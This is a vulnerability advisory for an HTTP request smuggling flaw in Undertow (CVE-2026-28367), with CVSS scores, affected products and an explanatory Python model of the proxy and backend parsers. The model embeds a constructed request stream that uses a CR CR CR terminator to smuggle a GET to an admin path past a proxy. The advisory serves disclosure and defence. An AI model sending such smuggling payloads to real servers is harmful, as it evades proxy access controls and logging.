CVE-2026-28367

EUVD-2026-16694
A flaw was found in Undertow: its HTTP parser accepts `\r\r\r` as the terminator of the request header block, whereas HTTP/1.1 (RFC 9112) ends the header section only at `\r\n\r\n`. A remote attacker can exploit this by sending a request whose header block ends with `\r\r\r`. When Undertow sits behind a proxy that does not treat `\r\r\r` as the end of the headers, such as older versions of Apache Traffic Server and Google Cloud Classic Application Load Balancer, the proxy and Undertow disagree on where one request ends and the next begins. This can be used for HTTP request smuggling, potentially leading to unauthorized access to, or manipulation of, web requests.
Weakness: HTTP Request/Response Smuggling (CWE-444)
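The parser disagreement behind this smuggling, as an added example written for this page (it is not Undertow's code, not the proxy's code, and not taken from the advisory). Two simplified models are fed the same constructed byte stream: a "tolerant proxy" that ends the header block only at `\r\n\r\n` and passes bare CRs through inside field values (how a given real proxy handles bare CR is proxy-specific and not stated on this page), and a "lenient backend" modelled on the advisory that also ends the block at `\r\r\r`. A third, strict mode rejects any bare CR in the header block, which is the RFC 9112 recipient behaviour that closes the gap. The request stream and the `/admin/smuggled` target are constructed for the demonstration.

```python
"""Model of the CR CR CR header-terminator discrepancy behind CVE-2026-28367.

Constructed models, not real parser code:
  - tolerant proxy : header block ends only at CRLF CRLF; bare CR passes through
  - lenient backend: header block ALSO ends at CR CR CR (the advisory's behaviour)
  - strict         : rejects any bare CR in the header block (RFC 9112 section 2.2)
"""
import re

# Constructed request stream; nothing here is from a real capture.
# The tolerant proxy forwards this as ONE request (POST /upload, empty body).
# The lenient backend sees TWO: POST /upload, then GET /admin/smuggled.
STREAM = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: app.example\r\n"
    b"Content-Length: 0\r\n"
    b"X-Pad: a\r\r\r"                 # CR CR CR: end of headers for the lenient parser only
    b"GET /admin/smuggled HTTP/1.1\r\n"
    b"Host: app.example\r\n"
    b"\r\n"
)

BARE_CR = re.compile(rb"\r(?!\n)")    # a CR not followed by LF


def find_header_end(data, start, accept_crcrcr):
    """Return (index, terminator_length) of the earliest header-block terminator
    at or after `start`, or None if the block is incomplete."""
    candidates = [(data.find(b"\r\n\r\n", start), 4)]
    if accept_crcrcr:
        candidates.append((data.find(b"\r\r\r", start), 3))
    candidates = [(i, n) for i, n in candidates if i != -1]
    return min(candidates) if candidates else None


def parse_stream(data, accept_crcrcr=False, reject_bare_cr=False):
    """Split a byte stream into requests; returns [(method, target, body), ...].

    Body length comes from Content-Length (default 0). Raises ValueError on an
    incomplete request or, in strict mode, on a bare CR inside the header block.
    """
    requests = []
    pos = 0
    while pos < len(data):
        hit = find_header_end(data, pos, accept_crcrcr)
        if hit is None:
            raise ValueError("incomplete request")
        end, term_len = hit
        head = data[pos:end]
        if reject_bare_cr and BARE_CR.search(head):
            raise ValueError("bare CR in header block")
        lines = head.split(b"\r\n")
        method, target, _version = lines[0].split(b" ", 2)
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get(b"content-length", b"0"))
        body_start = end + term_len
        body = data[body_start:body_start + length]
        requests.append((method.decode(), target.decode(), body))
        pos = body_start + length
    return requests


def proxy_view(data):
    """Requests as the tolerant proxy counts them (CRLF CRLF only)."""
    return [(m, t) for m, t, _ in parse_stream(data)]


def backend_view(data):
    """Requests as the lenient backend counts them (CRLF CRLF or CR CR CR)."""
    return [(m, t) for m, t, _ in parse_stream(data, accept_crcrcr=True)]


def strict_rejects(data):
    """True if an RFC-strict parser refuses the stream because of a bare CR."""
    try:
        parse_stream(data, reject_bare_cr=True)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("proxy sees  :", proxy_view(STREAM))
    print("backend sees:", backend_view(STREAM))
    print("strict parser rejects stream:", strict_rejects(STREAM))
```

Running it shows the proxy forwarding a single `POST /upload` while the backend answers two requests, the second of which the proxy never authorised or logged as a request; the strict mode shows the check a front end or server should apply, since RFC 9112 requires a recipient to treat a bare CR in a start line or field as invalid (or replace it with a space) rather than parse around it.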
CVSS 3.x (NIST, primary)
  Base score:          8.7 HIGH
  Attack vector:       NETWORK
  Attack complexity:   HIGH
  Privileges required: NONE
  Vector:              CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
EPSS percentile: 14%
Affected Products (NVD)
Vendor and product names are NVD CPE identifiers; versions listed are those NVD marks as vulnerable.
Vendor   Product                                              Version
redhat   build_of_apache_camel_-_hawtio                       4.0
redhat   build_of_apache_camel_for_spring_boot                4.0
redhat   data_grid                                            8.0
redhat   fuse                                                 7.0.0
redhat   jboss_enterprise_application_platform                7.0.0
redhat   jboss_enterprise_application_platform                8.0.0
redhat   jboss_enterprise_application_platform_expansion_pack -
redhat   process_automation                                   7.0
redhat   single_sign-on                                       7.0
redhat   undertow                                             -
Debian Releases
Product    Codename   Status
undertow   forky      vulnerable
undertow   sid        vulnerable